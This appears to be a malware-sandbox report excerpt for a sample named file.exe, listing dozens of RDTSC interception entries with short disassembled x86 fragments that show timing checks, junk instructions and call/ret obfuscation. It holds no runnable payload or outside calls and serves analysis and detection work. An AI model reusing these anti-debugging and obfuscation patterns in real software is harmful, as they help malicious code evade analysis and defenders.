                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B7ED second address: B3B7F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A8AD second address: B3A962 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4A81237CC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4A81237CD2h 0x00000010 nop 0x00000011 add di, 1A13h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F4A81237CC8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 mov edi, dword ptr [ebp+122D2F3Ch] 0x0000003d jmp 00007F4A81237CCEh 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007F4A81237CC8h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 00000016h 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 mov ebx, dword ptr [ebp+122D2E74h] 0x00000069 mov bl, 95h 0x0000006b mov eax, dword ptr [ebp+122D0D7Dh] 0x00000071 mov ebx, dword ptr [ebp+122D1B83h] 0x00000077 push FFFFFFFFh 0x00000079 jmp 00007F4A81237CCDh 0x0000007e push eax 0x0000007f jl 00007F4A81237CD4h 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A962 second address: B3A966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B405F6 second address: B405FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44A6E second address: B44A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44A76 second address: B44AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4A81237CC6h 0x0000000a js 00007F4A81237CC6h 0x00000010 jmp 00007F4A81237CD5h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F4A81237CD0h 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44AB2 second address: B44AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44AB8 second address: B44AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B445D0 second address: B445E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B445E7 second address: B445ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B445ED second address: B445F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49C7A second address: B49C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49C7E second address: B49CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F4A80B11C47h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edx 0x00000017 jo 00007F4A80B11C3Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49DC9 second address: B49DF9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F4A81237CCBh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4A81237CD3h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49DF9 second address: B49DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EEE1 second address: B4EEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4A81237CCCh 0x0000000a jnc 00007F4A81237CCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EEF9 second address: B4EF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jbe 00007F4A80B11C36h 0x0000000e jmp 00007F4A80B11C3Ah 0x00000013 jne 00007F4A80B11C36h 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EF1B second address: B4EF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007F4A81237CC6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EF2A second address: B4EF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EF30 second address: B4EF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E4B6 second address: B4E4CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C45h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E4CF second address: B4E4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jo 00007F4A81237CC6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E4E1 second address: B4E519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C3Bh 0x00000007 jnl 00007F4A80B11C36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F4A80B11C45h 0x00000014 push edi 0x00000015 jmp 00007F4A80B11C3Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E843 second address: B4E848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E848 second address: B4E84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E84E second address: B4E852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E852 second address: B4E861 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E99E second address: B4E9A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E9A2 second address: B4E9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E9A8 second address: B4E9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F4A81237CCBh 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 jnp 00007F4A81237CC6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F4A81237CC6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E9CF second address: B4E9E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ED10 second address: B4ED48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD1h 0x00000007 jnc 00007F4A81237CCCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007F4A81237CD2h 0x00000016 jnl 00007F4A81237CC6h 0x0000001c jl 00007F4A81237CC6h 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ED48 second address: B4ED73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F4A80B11C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4A80B11C42h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4A80B11C3Bh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54667 second address: B5466D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5466D second address: B54675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53422 second address: B5343F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B535B8 second address: B535CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C40h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B535CC second address: B535D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B539F8 second address: B539FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5314B second address: B53151 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53151 second address: B53156 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53D8D second address: B53D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4A81237CC6h 0x0000000a jp 00007F4A81237CC6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B543F4 second address: B543F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B8CA second address: B5B8D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F4A81237CC6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B8D9 second address: B5B8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C01E second address: B04AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F4A81237CC8h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov edx, dword ptr [ebp+122D2DD8h] 0x00000027 call dword ptr [ebp+122D1851h] 0x0000002d push ebx 0x0000002e pushad 0x0000002f push esi 0x00000030 pop esi 0x00000031 jmp 00007F4A81237CCCh 0x00000036 popad 0x00000037 pop ebx 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C116 second address: B1C11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C11A second address: B1C120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C25C second address: B1C261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C261 second address: B1C266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C5AE second address: B1C5B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C6FE second address: B1C71D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4A81237CD7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C71D second address: B1C721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C721 second address: B1C73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4A81237CCCh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C73B second address: B1C73F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C9B2 second address: B1C9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C9B6 second address: B1C9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CB57 second address: B1CB64 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CB64 second address: B1CBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F4A80B11C38h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 xor ecx, dword ptr [ebp+122D2D34h] 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F4A80B11C38h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 adc cl, FFFFFFCAh 0x00000048 push eax 0x00000049 je 00007F4A80B11C42h 0x0000004f jg 00007F4A80B11C3Ch 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D314 second address: B1D31E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4A81237CCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D31E second address: B05640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 jmp 00007F4A80B11C46h 0x0000000d pop ebx 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F4A80B11C38h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 call dword ptr [ebp+122D1BCEh] 0x0000002f pushad 0x00000030 pushad 0x00000031 push esi 0x00000032 pop esi 0x00000033 jnl 00007F4A80B11C36h 0x00000039 push eax 0x0000003a pop eax 0x0000003b popad 0x0000003c jmp 00007F4A80B11C49h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F4A80B11C47h 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05640 second address: B05644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BD15 second address: B5BD6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C48h 0x00000007 jo 00007F4A80B11C51h 0x0000000d jmp 00007F4A80B11C49h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4A80B11C40h 0x0000001e jp 00007F4A80B11C36h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BEE6 second address: B5BEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C455 second address: B5C459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C459 second address: B5C476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CCAh 0x00000007 jmp 00007F4A81237CCFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C476 second address: B5C494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C46h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C494 second address: B5C498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C498 second address: B5C49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C49C second address: B5C4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A81237CCAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4A81237CCEh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C4C5 second address: B5C4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6271C second address: B62722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61456 second address: B61460 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A80B11C3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61460 second address: B6147F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4A81237CCDh 0x0000000f jl 00007F4A81237CC8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6147F second address: B6148A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F4A80B11C36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61734 second address: B6176C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4A81237CD4h 0x0000000b popad 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F4A81237CCFh 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F4A81237CC6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61B9D second address: B61BBF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4A80B11C45h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F4A80B11C58h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61BBF second address: B61BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A81237CCCh 0x00000009 js 00007F4A81237CC6h 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61D39 second address: B61D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4A80B11C36h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BB9E second address: B6BBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4A81237CC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BCD4 second address: B6BCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A80B11C3Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BE88 second address: B6BE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F4A81237CCEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BE9C second address: B6BEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BEA8 second address: B6BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BEAE second address: B6BEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C02F second address: B6C050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD7h 0x00000007 jnp 00007F4A81237CDFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FED4 second address: B6FEF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FEF2 second address: B6FEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
